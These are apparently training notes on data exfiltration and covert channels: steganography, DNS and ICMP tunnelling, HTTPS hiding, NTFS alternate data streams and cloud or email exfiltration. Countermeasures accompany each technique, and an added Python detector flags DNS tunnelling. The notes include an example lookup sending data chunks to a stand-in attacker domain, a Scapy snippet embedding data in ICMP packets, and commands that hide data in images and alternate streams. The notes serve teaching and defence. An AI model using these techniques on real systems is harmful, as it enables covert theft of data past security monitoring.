Exfiltration
- Definition: Covertly transferring data from a target system to an attacker-controlled location
- Purpose: Realize value of a breach by securing stolen information (e.g., PII, IP)
Covert Channels
- Definition: Transfer information in ways not easily detected by standard security tools
- Importance: Essential for bypassing security measures during penetration tests and real attacks
Steganography
- Concept: Embed secret payloads within non-secret media (images, audio, video)
- Example Tool: Java-based LSB steganography—converts ASCII text to binary, modifying image pixels
- Process:
- Select host file (e.g., photo.png)
- Convert secret message to binary
- Modify least significant bits of pixels, imperceptible to human eye
- Countermeasures:
- Use data loss prevention (DLP) tools to inspect for unusual file signatures
- Stego data bypasses signature matching by embedding inside media
- Analogy: Spy uses a newspaper ad; first letter of each word forms a secret message
DNS Covert Channels
- Technique: Break data into chunks, encode each chunk into DNS query subdomain
- Example Flow:
- Attacker-controlled DNS server responds to queries
- Compromised host performs nslookup secretchunk.exfil.attacker.com
- DNS query payload captured and decoded by attacker
- Use Case: Appears as normal DNS traffic; minimal chance of detection by standard filtering
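Detection logic for the DNS channel described above, as an added example that is not part of the original notes: it groups queries by registered domain and flags domains that receive many unique, long, high-entropy leftmost labels, which is what chunked data in subdomains looks like. The log format, the query names and the thresholds are constructed assumptions for the demonstration.

```python
import math
from collections import defaultdict

# Constructed sample resolver log (not real traffic): "<time> <client_ip> <qname>".
# The labels under attacker.com stand in for encoded data chunks.
SAMPLE_LOG = """\
10:00:01 10.0.0.7 www.example.com
10:00:02 10.0.0.7 mail.example.com
10:00:03 10.0.0.9 k7q2zx9mdp4vn3wb.exfil.attacker.com
10:00:04 10.0.0.9 t5yg8hj1rc6lf0ae.exfil.attacker.com
10:00:05 10.0.0.9 u9sm2kq7xz3pd4wn.exfil.attacker.com
10:00:06 10.0.0.9 b6vc1nh8jy5tg0rl.exfil.attacker.com
10:00:07 10.0.0.9 e3qa7fk9mz2xd5pw.exfil.attacker.com
10:00:08 10.0.0.7 a1b2c3d4e5f6g7h8.static-cdn.example
10:00:09 10.0.0.7 cdn.example.com
"""

def shannon_entropy(s: str) -> float:
    """Bits per character; encoded chunks score far above dictionary words."""
    if not s:
        return 0.0
    counts = {c: s.count(c) for c in set(s)}
    return -sum(n / len(s) * math.log2(n / len(s)) for n in counts.values())

def registered_domain(qname: str) -> str:
    """Naive eTLD+1 (last two labels); a public-suffix list is assumed unnecessary here."""
    return ".".join(qname.rstrip(".").split(".")[-2:])

def find_suspicious_domains(log_text, min_queries=5, min_entropy=3.0, min_label_len=12):
    """Flag domains whose leftmost labels are long, high-entropy and mostly unique.
    A single odd hostname (e.g. a CDN asset) stays below min_queries and is not flagged."""
    per_domain = defaultdict(list)
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue  # skip malformed lines
        qname = parts[2]
        per_domain[registered_domain(qname)].append(qname.split(".")[0])
    flagged = {}
    for domain, labels in per_domain.items():
        odd = [l for l in labels if len(l) >= min_label_len and shannon_entropy(l) >= min_entropy]
        unique_ratio = len(set(labels)) / len(labels)
        if len(odd) >= min_queries and unique_ratio > 0.9:
            flagged[domain] = {"queries": len(labels), "high_entropy": len(odd),
                               "unique_ratio": round(unique_ratio, 2)}
    return flagged

if __name__ == "__main__":
    for domain, stats in find_suspicious_domains(SAMPLE_LOG).items():
        print(f"possible DNS covert channel: {domain} {stats}")
```

Thresholds are a starting point only; tune min_queries and min_entropy against a baseline of the environment's own resolver logs to keep false positives from legitimate CDN and telemetry hostnames manageable.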
ICMP Covert Channels
- Technique: Embed hidden data in ICMP packet payloads (Echo Request/Reply)
- Example:
# Craft ICMP packet with Scapy
from scapy.all import IP, ICMP, send
pkt = IP(dst="10.0.0.5")/ICMP()/b"SECRET_DATA"
send(pkt)
- Rationale: ICMP often allowed through firewalls for diagnostics, making hidden data transport easy
- Detection: Monitor ICMP payload sizes or frequency anomalies
HTTPS Covert Channels
- Technique: Hide data within encrypted HTTPS requests/responses
- Example:
- Exfiltrate JSON payload via POST to https://legit-site.com/login with hidden parameters
- Server logs appear normal; payload extracted by attacker later
- Rationale: Encrypted traffic resists inspection; security tools struggle to inspect without decryption
- Detection: Analyze TLS session metadata for unusual request sizes or timing patterns
Steganography: A Demonstration
- Practice: Hiding text in an image without altering appearance
- Steps:
- Choose image file (cover.png)
- Insert message via LSB tool:
stego_tool hide -i cover.png -o stego.png -m secret.txt
- Distribute stego.png; attacker extracts with:
stego_tool extract -i stego.png -o extracted.txt
- Key: No encryption; anyone with tool and method can retrieve hidden data
- Countermeasures: Use steganalysis tools, monitor for files with abnormal pixel patterns
Alternate Data Streams (ADS)
- Definition: NTFS feature allowing multiple data streams in a single filename
- Purpose: Originally for HFS compatibility; abused to hide data without changing file size
- Malicious Use:
- Hide sensitive data in report.txt:hiddenStream:
echo HiddenSecret > report.txt:hiddenStream
- Transfer report.txt; hidden data persists in ADS
- Retrieval:
more < report.txt:hiddenStream
- Detection & Prevention:
- Standard tools don’t show ADS; use Sysinternals Streams utility:
streams.exe C:\path\to\file
- Audit for unexpected ADS on critical files; enforce strict file access controls
Exfiltration Strategies
- Virtual Drive Mounting
- Mount attacker-controlled network share as local drive; copy sensitive files directly
- Email Exfiltration
- Attach compressed/encrypted archives to email; send to external address
- Cross-Account Resource Usage
- Use compromised cloud creds to upload data to attacker-controlled S3 bucket
- Cloud Storage
- Services like Google Drive, Dropbox, OneDrive for file sharing; transfers are already encrypted
- Text storage sites (pastebins)
- Allow users to host text files publicly or privately; content is obfuscated/encoded to evade detection